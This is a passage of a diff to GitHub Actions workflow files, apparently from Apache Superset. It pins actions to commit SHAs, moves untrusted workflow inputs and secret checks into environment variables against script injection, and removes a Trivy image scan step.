@@ -42,7 +42,7 @@ jobs:
|
||||
steps:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
|
||||
@@ -101,23 +101,6 @@ jobs:
|
||||
docker images $IMAGE_TAG
|
||||
docker history $IMAGE_TAG
|
||||
|
||||
# Scan for vulnerabilities in built container image after pushes to mainline branch.
|
||||
- name: Run Trivy container image vulnerabity scan
|
||||
if: github.event_name == 'push' && github.ref == 'refs/heads/master' && (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'lean'
|
||||
uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1 # v0.35.0
|
||||
with:
|
||||
image-ref: ${{ env.IMAGE_TAG }}
|
||||
format: 'sarif'
|
||||
output: 'trivy-results.sarif'
|
||||
vuln-type: 'os'
|
||||
severity: 'CRITICAL,HIGH'
|
||||
ignore-unfixed: true
|
||||
- name: Upload Trivy scan results to GitHub Security tab
|
||||
if: github.event_name == 'push' && github.ref == 'refs/heads/master' && (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'lean'
|
||||
uses: github/codeql-action/upload-sarif@1b168cd39490f61582a9beae412bb7057a6b2c4e # v4.31.8
|
||||
with:
|
||||
sarif_file: 'trivy-results.sarif'
|
||||
|
||||
- name: docker-compose sanity check
|
||||
if: (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'dev'
|
||||
shell: bash
|
||||
@@ -134,7 +117,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
- name: Check for file changes
|
||||
|
||||
8
.github/workflows/embedded-sdk-release.yml
vendored
8
.github/workflows/embedded-sdk-release.yml
vendored
@@ -16,10 +16,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.NPM_TOKEN != '') || '' }}" ]; then
|
||||
if [ -n "${NPM_TOKEN}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
NPM_TOKEN: ${{ (secrets.NPM_TOKEN != '') || '' }}
|
||||
build:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -28,8 +30,8 @@ jobs:
|
||||
run:
|
||||
working-directory: superset-embedded-sdk
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/setup-node@v6
|
||||
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
- uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-embedded-sdk/.nvmrc'
|
||||
registry-url: 'https://registry.npmjs.org'
|
||||
|
||||
4
.github/workflows/embedded-sdk-test.yml
vendored
4
.github/workflows/embedded-sdk-test.yml
vendored
@@ -18,8 +18,8 @@ jobs:
|
||||
run:
|
||||
working-directory: superset-embedded-sdk
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/setup-node@v6
|
||||
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
- uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-embedded-sdk/.nvmrc'
|
||||
registry-url: 'https://registry.npmjs.org'
|
||||
|
||||
10
.github/workflows/ephemeral-env-pr-close.yml
vendored
10
.github/workflows/ephemeral-env-pr-close.yml
vendored
@@ -20,10 +20,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.AWS_ACCESS_KEY_ID != '' && secrets.AWS_SECRET_ACCESS_KEY != '') || '' }}" ]; then
|
||||
if [ -n "${AWS_ACCESS_KEY_ID}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
AWS_ACCESS_KEY_ID: ${{ (secrets.AWS_ACCESS_KEY_ID != '' && secrets.AWS_SECRET_ACCESS_KEY != '') || '' }}
|
||||
ephemeral-env-cleanup:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -33,7 +35,7 @@ jobs:
|
||||
pull-requests: write
|
||||
steps:
|
||||
- name: Configure AWS credentials
|
||||
uses: aws-actions/configure-aws-credentials@v6
|
||||
uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
|
||||
with:
|
||||
aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
|
||||
aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
|
||||
@@ -56,7 +58,7 @@ jobs:
|
||||
- name: Login to Amazon ECR
|
||||
if: steps.describe-services.outputs.active == 'true'
|
||||
id: login-ecr
|
||||
uses: aws-actions/amazon-ecr-login@v2
|
||||
uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2
|
||||
|
||||
- name: Delete ECR image tag
|
||||
if: steps.describe-services.outputs.active == 'true'
|
||||
@@ -69,7 +71,7 @@ jobs:
|
||||
|
||||
- name: Comment (success)
|
||||
if: steps.describe-services.outputs.active == 'true'
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{github.token}}
|
||||
script: |
|
||||
|
||||
40
.github/workflows/ephemeral-env.yml
vendored
40
.github/workflows/ephemeral-env.yml
vendored
@@ -47,7 +47,7 @@ jobs:
|
||||
id: eval-label
|
||||
run: |
|
||||
if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
|
||||
LABEL_NAME="${{ github.event.inputs.label_name }}"
|
||||
LABEL_NAME="${INPUT_LABEL_NAME}"
|
||||
else
|
||||
LABEL_NAME="${{ github.event.label.name }}"
|
||||
fi
|
||||
@@ -60,10 +60,12 @@ jobs:
|
||||
echo "result=noop" >> $GITHUB_OUTPUT
|
||||
fi
|
||||
|
||||
env:
|
||||
INPUT_LABEL_NAME: ${{ github.event.inputs.label_name }}
|
||||
- name: Get event SHA
|
||||
id: get-sha
|
||||
if: steps.eval-label.outputs.result == 'up'
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{ secrets.GITHUB_TOKEN }}
|
||||
script: |
|
||||
@@ -94,7 +96,7 @@ jobs:
|
||||
core.setOutput("sha", prSha);
|
||||
|
||||
- name: Looking for feature flags in PR description
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
id: eval-feature-flags
|
||||
if: steps.eval-label.outputs.result == 'up'
|
||||
with:
|
||||
@@ -116,7 +118,7 @@ jobs:
|
||||
return results;
|
||||
|
||||
- name: Reply with confirmation comment
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
if: steps.eval-label.outputs.result == 'up'
|
||||
with:
|
||||
github-token: ${{ secrets.GITHUB_TOKEN }}
|
||||
@@ -160,7 +162,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ needs.ephemeral-env-label.outputs.sha }} : ${{steps.get-sha.outputs.sha}} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
ref: ${{ needs.ephemeral-env-label.outputs.sha }}
|
||||
persist-credentials: false
|
||||
@@ -189,7 +191,7 @@ jobs:
|
||||
--extra-flags "--build-arg INCLUDE_CHROMIUM=false"
|
||||
|
||||
- name: Configure AWS credentials
|
||||
uses: aws-actions/configure-aws-credentials@v6
|
||||
uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
|
||||
with:
|
||||
aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
|
||||
aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
|
||||
@@ -197,7 +199,7 @@ jobs:
|
||||
|
||||
- name: Login to Amazon ECR
|
||||
id: login-ecr
|
||||
uses: aws-actions/amazon-ecr-login@v2
|
||||
uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2
|
||||
|
||||
- name: Load, tag and push image to ECR
|
||||
id: push-image
|
||||
@@ -220,12 +222,12 @@ jobs:
|
||||
pull-requests: write
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
|
||||
- name: Configure AWS credentials
|
||||
uses: aws-actions/configure-aws-credentials@v6
|
||||
uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
|
||||
with:
|
||||
aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
|
||||
aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
|
||||
@@ -233,7 +235,7 @@ jobs:
|
||||
|
||||
- name: Login to Amazon ECR
|
||||
id: login-ecr
|
||||
uses: aws-actions/amazon-ecr-login@v2
|
||||
uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2
|
||||
|
||||
- name: Check target image exists in ECR
|
||||
id: check-image
|
||||
@@ -248,7 +250,7 @@ jobs:
|
||||
|
||||
- name: Fail on missing container image
|
||||
if: steps.check-image.outcome == 'failure'
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{ github.token }}
|
||||
script: |
|
||||
@@ -263,7 +265,7 @@ jobs:
|
||||
|
||||
- name: Fill in the new image ID in the Amazon ECS task definition
|
||||
id: task-def
|
||||
uses: aws-actions/amazon-ecs-render-task-definition@v1
|
||||
uses: aws-actions/amazon-ecs-render-task-definition@77954e213ba1f9f9cb016b86a1d4f6fcdea0d57e # v1
|
||||
with:
|
||||
task-definition: .github/workflows/ecs-task-definition.json
|
||||
container-name: superset-ci
|
||||
@@ -276,7 +278,9 @@ jobs:
|
||||
- name: Describe ECS service
|
||||
id: describe-services
|
||||
run: |
|
||||
echo "active=$(aws ecs describe-services --cluster superset-ci --services pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service | jq '.services[] | select(.status == "ACTIVE") | any')" >> $GITHUB_OUTPUT
|
||||
echo "active=$(aws ecs describe-services --cluster superset-ci --services pr-${INPUT_ISSUE_NUMBER}-service | jq '.services[] | select(.status == "ACTIVE") | any')" >> $GITHUB_OUTPUT
|
||||
env:
|
||||
INPUT_ISSUE_NUMBER: ${{ github.event.inputs.issue_number || github.event.pull_request.number }}
|
||||
- name: Create ECS service
|
||||
id: create-service
|
||||
if: steps.describe-services.outputs.active != 'true'
|
||||
@@ -296,7 +300,7 @@ jobs:
|
||||
--tags key=pr,value=$PR_NUMBER key=github_user,value=${{ github.actor }}
|
||||
- name: Deploy Amazon ECS task definition
|
||||
id: deploy-task
|
||||
uses: aws-actions/amazon-ecs-deploy-task-definition@v2
|
||||
uses: aws-actions/amazon-ecs-deploy-task-definition@fc8fc60f3a60ffd500fcb13b209c59d221ac8c8c # v2
|
||||
with:
|
||||
task-definition: ${{ steps.task-def.outputs.task-definition }}
|
||||
service: pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service
|
||||
@@ -307,7 +311,9 @@ jobs:
|
||||
- name: List tasks
|
||||
id: list-tasks
|
||||
run: |
|
||||
echo "task=$(aws ecs list-tasks --cluster superset-ci --service-name pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service | jq '.taskArns | first')" >> $GITHUB_OUTPUT
|
||||
echo "task=$(aws ecs list-tasks --cluster superset-ci --service-name pr-${INPUT_ISSUE_NUMBER}-service | jq '.taskArns | first')" >> $GITHUB_OUTPUT
|
||||
env:
|
||||
INPUT_ISSUE_NUMBER: ${{ github.event.inputs.issue_number || github.event.pull_request.number }}
|
||||
- name: Get network interface
|
||||
id: get-eni
|
||||
run: |
|
||||
@@ -318,7 +324,7 @@ jobs:
|
||||
echo "ip=$(aws ec2 describe-network-interfaces --network-interface-ids ${{ steps.get-eni.outputs.eni }} | jq -r '.NetworkInterfaces | first | .Association.PublicIp')" >> $GITHUB_OUTPUT
|
||||
- name: Comment (success)
|
||||
if: ${{ success() }}
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{github.token}}
|
||||
script: |
|
||||
@@ -331,7 +337,7 @@ jobs:
|
||||
});
|
||||
- name: Comment (failure)
|
||||
if: ${{ failure() }}
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{github.token}}
|
||||
script: |
|
||||
|
||||
8
.github/workflows/generate-FOSSA-report.yml
vendored
8
.github/workflows/generate-FOSSA-report.yml
vendored
@@ -16,10 +16,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.FOSSA_API_KEY != '' ) || '' }}" ]; then
|
||||
if [ -n "${FOSSA_API_KEY}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
FOSSA_API_KEY: ${{ (secrets.FOSSA_API_KEY != '' ) || '' }}
|
||||
license_check:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -27,12 +29,12 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
|
||||
with:
|
||||
distribution: "temurin"
|
||||
java-version: "11"
|
||||
|
||||
@@ -14,10 +14,10 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Checkout Repository
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
|
||||
- name: Set up Node.js
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version: '20'
|
||||
|
||||
|
||||
2
.github/workflows/issue_creation.yml
vendored
2
.github/workflows/issue_creation.yml
vendored
@@ -17,7 +17,7 @@ jobs:
|
||||
steps:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
|
||||
|
||||
2
.github/workflows/latest-release-tag.yml
vendored
2
.github/workflows/latest-release-tag.yml
vendored
@@ -12,7 +12,7 @@ jobs:
|
||||
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
|
||||
4
.github/workflows/license-check.yml
vendored
4
.github/workflows/license-check.yml
vendored
@@ -15,12 +15,12 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: '11'
|
||||
|
||||
2
.github/workflows/no-hold-label.yml
vendored
2
.github/workflows/no-hold-label.yml
vendored
@@ -17,7 +17,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Check for 'hold' label
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{secrets.GITHUB_TOKEN}}
|
||||
script: |
|
||||
|
||||
2
.github/workflows/pr-lint.yml
vendored
2
.github/workflows/pr-lint.yml
vendored
@@ -16,7 +16,7 @@ jobs:
|
||||
pull-requests: write
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
|
||||
6
.github/workflows/pre-commit.yml
vendored
6
.github/workflows/pre-commit.yml
vendored
@@ -24,7 +24,7 @@ jobs:
|
||||
python-version: ["current", "previous", "next"]
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -42,7 +42,7 @@ jobs:
|
||||
echo "HOMEBREW_REPOSITORY=$HOMEBREW_REPOSITORY" >>"${GITHUB_ENV}"
|
||||
brew install norwoodj/tap/helm-docs
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version: '20'
|
||||
|
||||
@@ -57,7 +57,7 @@ jobs:
|
||||
yarn install --immutable
|
||||
|
||||
- name: Cache pre-commit environments
|
||||
uses: actions/cache@v5
|
||||
uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
|
||||
with:
|
||||
path: ~/.cache/pre-commit
|
||||
key: pre-commit-v2-${{ runner.os }}-py${{ matrix.python-version }}-${{ hashFiles('.pre-commit-config.yaml') }}
|
||||
|
||||
12
.github/workflows/release.yml
vendored
12
.github/workflows/release.yml
vendored
@@ -16,17 +16,19 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.NPM_TOKEN != '' && secrets.GH_PERSONAL_ACCESS_TOKEN != '') || '' }}" ]; then
|
||||
if [ -n "${NPM_TOKEN}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
NPM_TOKEN: ${{ (secrets.NPM_TOKEN != '' && secrets.GH_PERSONAL_ACCESS_TOKEN != '') || '' }}
|
||||
build:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
name: Bump version and publish package(s)
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
# pulls all commits (needed for lerna / semantic release to correctly version)
|
||||
fetch-depth: 0
|
||||
@@ -42,13 +44,13 @@ jobs:
|
||||
|
||||
- name: Install Node.js
|
||||
if: env.HAS_TAGS
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
|
||||
- name: Cache npm
|
||||
if: env.HAS_TAGS
|
||||
uses: actions/cache@v5
|
||||
uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
|
||||
with:
|
||||
path: ~/.npm # npm cache files are stored in `~/.npm` on Linux/macOS
|
||||
key: ${{ runner.OS }}-node-${{ hashFiles('**/package-lock.json') }}
|
||||
@@ -62,7 +64,7 @@ jobs:
|
||||
run: echo "dir=$(npm config get cache)" >> $GITHUB_OUTPUT
|
||||
- name: Cache npm
|
||||
if: env.HAS_TAGS
|
||||
uses: actions/cache@v5
|
||||
uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
|
||||
id: npm-cache # use this to check for `cache-hit` (`steps.npm-cache.outputs.cache-hit != 'true'`)
|
||||
with:
|
||||
path: ${{ steps.npm-cache-dir-path.outputs.dir }}
|
||||
|
||||
18
.github/workflows/showtime-trigger.yml
vendored
18
.github/workflows/showtime-trigger.yml
vendored
@@ -37,7 +37,7 @@ jobs:
|
||||
steps:
|
||||
- name: Security Check - Authorize Maintainers Only
|
||||
id: auth
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
@@ -102,10 +102,12 @@ jobs:
|
||||
- name: Install Superset Showtime
|
||||
if: steps.auth.outputs.authorized == 'true'
|
||||
run: |
|
||||
echo "::notice::Maintainer ${{ github.actor }} triggered deploy for PR ${{ github.event.pull_request.number || github.event.inputs.pr_number }}"
|
||||
echo "::notice::Maintainer ${{ github.actor }} triggered deploy for PR ${PULL_REQUEST_NUMBER}"
|
||||
pip install --upgrade superset-showtime
|
||||
showtime version
|
||||
|
||||
env:
|
||||
PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number || github.event.inputs.pr_number }}
|
||||
- name: Check what actions are needed
|
||||
if: steps.auth.outputs.authorized == 'true'
|
||||
id: check
|
||||
@@ -113,12 +115,14 @@ jobs:
|
||||
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
|
||||
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
INPUT_PR_NUMBER: ${{ github.event.inputs.pr_number }}
|
||||
INPUT_SHA: ${{ github.event.inputs.sha }}
|
||||
run: |
|
||||
# Bulletproof PR number extraction
|
||||
if [[ -n "${{ github.event.pull_request.number }}" ]]; then
|
||||
PR_NUM="${{ github.event.pull_request.number }}"
|
||||
elif [[ -n "${{ github.event.inputs.pr_number }}" ]]; then
|
||||
PR_NUM="${{ github.event.inputs.pr_number }}"
|
||||
elif [[ -n "${INPUT_PR_NUMBER}" ]]; then
|
||||
PR_NUM="${INPUT_PR_NUMBER}"
|
||||
else
|
||||
echo "❌ No PR number found in event or inputs"
|
||||
exit 1
|
||||
@@ -127,8 +131,8 @@ jobs:
|
||||
echo "Using PR number: $PR_NUM"
|
||||
|
||||
# Run sync check-only with optional SHA override
|
||||
if [[ -n "${{ github.event.inputs.sha }}" ]]; then
|
||||
OUTPUT=$(python -m showtime sync $PR_NUM --check-only --sha "${{ github.event.inputs.sha }}")
|
||||
if [[ -n "${INPUT_SHA}" ]]; then
|
||||
OUTPUT=$(python -m showtime sync $PR_NUM --check-only --sha "${INPUT_SHA}")
|
||||
else
|
||||
OUTPUT=$(python -m showtime sync $PR_NUM --check-only)
|
||||
fi
|
||||
@@ -147,7 +151,7 @@ jobs:
|
||||
|
||||
- name: Checkout PR code (only if build needed)
|
||||
if: steps.auth.outputs.authorized == 'true' && steps.check.outputs.build_needed == 'true'
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
ref: ${{ steps.check.outputs.target_sha }}
|
||||
persist-credentials: false
|
||||
|
||||
2
.github/workflows/superset-app-cli.yml
vendored
2
.github/workflows/superset-app-cli.yml
vendored
@@ -37,7 +37,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
|
||||
14
.github/workflows/superset-docs-deploy.yml
vendored
14
.github/workflows/superset-docs-deploy.yml
vendored
@@ -27,10 +27,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.SUPERSET_SITE_BUILD != '' && secrets.SUPERSET_SITE_BUILD != '') || '' }}" ]; then
|
||||
if [ -n "${SUPERSET_SITE_BUILD}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
SUPERSET_SITE_BUILD: ${{ (secrets.SUPERSET_SITE_BUILD != '' && secrets.SUPERSET_SITE_BUILD != '') || '' }}
|
||||
build-deploy:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -38,18 +40,18 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.event.workflow_run.head_sha || github.sha }}"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
ref: ${{ github.event.workflow_run.head_sha || github.sha }}
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
- name: Set up Node.js
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './docs/.nvmrc'
|
||||
- name: Setup Python
|
||||
uses: ./.github/actions/setup-backend/
|
||||
- uses: actions/setup-java@v5
|
||||
- uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
|
||||
with:
|
||||
distribution: 'zulu'
|
||||
java-version: '21'
|
||||
@@ -68,7 +70,7 @@ jobs:
|
||||
yarn install --check-cache
|
||||
- name: Download database diagnostics (if triggered by integration tests)
|
||||
if: github.event_name == 'workflow_run' && github.event.workflow_run.conclusion == 'success'
|
||||
uses: dawidd6/action-download-artifact@v16
|
||||
uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
|
||||
continue-on-error: true
|
||||
with:
|
||||
workflow: superset-python-integrationtest.yml
|
||||
@@ -77,7 +79,7 @@ jobs:
|
||||
path: docs/src/data/
|
||||
- name: Try to download latest diagnostics (for push/dispatch triggers)
|
||||
if: github.event_name != 'workflow_run'
|
||||
uses: dawidd6/action-download-artifact@v16
|
||||
uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
|
||||
continue-on-error: true
|
||||
with:
|
||||
workflow: superset-python-integrationtest.yml
|
||||
|
||||
13
.github/workflows/superset-docs-verify.yml
vendored
13
.github/workflows/superset-docs-verify.yml
vendored
@@ -24,7 +24,7 @@ jobs:
|
||||
name: Link Checking
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
# Do not bump this linkinator-action version without opening
|
||||
# an ASF Infra ticket to allow the new version first!
|
||||
- uses: JustinBeckwith/linkinator-action@af984b9f30f63e796ae2ea5be5e07cb587f1bbd9 # v2.3
|
||||
@@ -67,12 +67,12 @@ jobs:
|
||||
working-directory: docs
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
- name: Set up Node.js
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './docs/.nvmrc'
|
||||
- name: yarn install
|
||||
@@ -98,25 +98,26 @@ jobs:
|
||||
working-directory: docs
|
||||
steps:
|
||||
- name: "Checkout PR head: ${{ github.event.workflow_run.head_sha }}"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
ref: ${{ github.event.workflow_run.head_sha }}
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
- name: Set up Node.js
|
||||
uses: actions/setup-node@v6
|
||||
